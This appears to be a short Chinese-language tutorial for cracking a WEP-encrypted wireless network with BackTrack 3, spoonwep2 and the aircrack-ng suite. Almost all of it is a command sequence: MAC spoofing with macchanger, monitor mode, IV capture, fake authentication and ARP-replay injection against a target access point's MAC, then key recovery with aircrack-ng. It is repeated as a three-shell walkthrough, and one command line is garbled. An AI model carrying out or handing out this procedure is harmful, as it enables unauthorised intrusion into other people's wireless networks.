1、打开终端，建立一个目录
mkdir spoonwep2
2、将 spoopwep2.lzm里面的文件解压缩到刚刚建立的文件夹中。
lzm2dir spoonwep2.lzm spoonwep2
3、进入这个spoonwep2的目录，把里面的usr目录下的内容替换掉/usr中的。
cp -r usr /

开始捕获操作

查看信息 ifconfig -a
启动USB无线网卡 ifconfig -a rausb0 up
更改网卡物理地址 macchanger -m 00:11:22:33:44:55 rausb0//可以不改
激活网卡的Monitor模式信道 airmon-ng start rausb0 6
开始捕获数据 airodump-ng -w name -c 6 rausb0 //name 是捕获文件的名字 6 信道
             dirodump-ng --ivs -w name -c [标记错误:1] rausb0
第二个窗口 输入握手命令

握手 aireplay-ng -1 0 -a 0810740afdee -h 001122334455 rausb0 //-a 指定ap 物理地址 -h 指定 本地无线网卡物理地址
输入抓握手包命令-arp注入 aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h 001122334455 -b 0810740afdee rausb0 //-h 网卡MAC -b AP的MAC

第三个窗口输入 aircrack-ng -n 64 *.cap //或者*.ivs 选择你要破解的AP

===================================================

选第一个BT3 Graphics mode (KDE),进入系统后开三个Shell。(PS:所要破解的AP信道是6)
在第一个shell里按步骤输入airmon-ng start rausb0 6
airodump-ng --ivs -w name -c 6 rausb0
第二个shell里输入aireplay-ng -1 0 -a AP'MAC -h 网卡MAC rausb0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -h 网卡MAC -b APMAC rausb0
第三个shell里输入aircrack-ng -n 64 name-01.ivs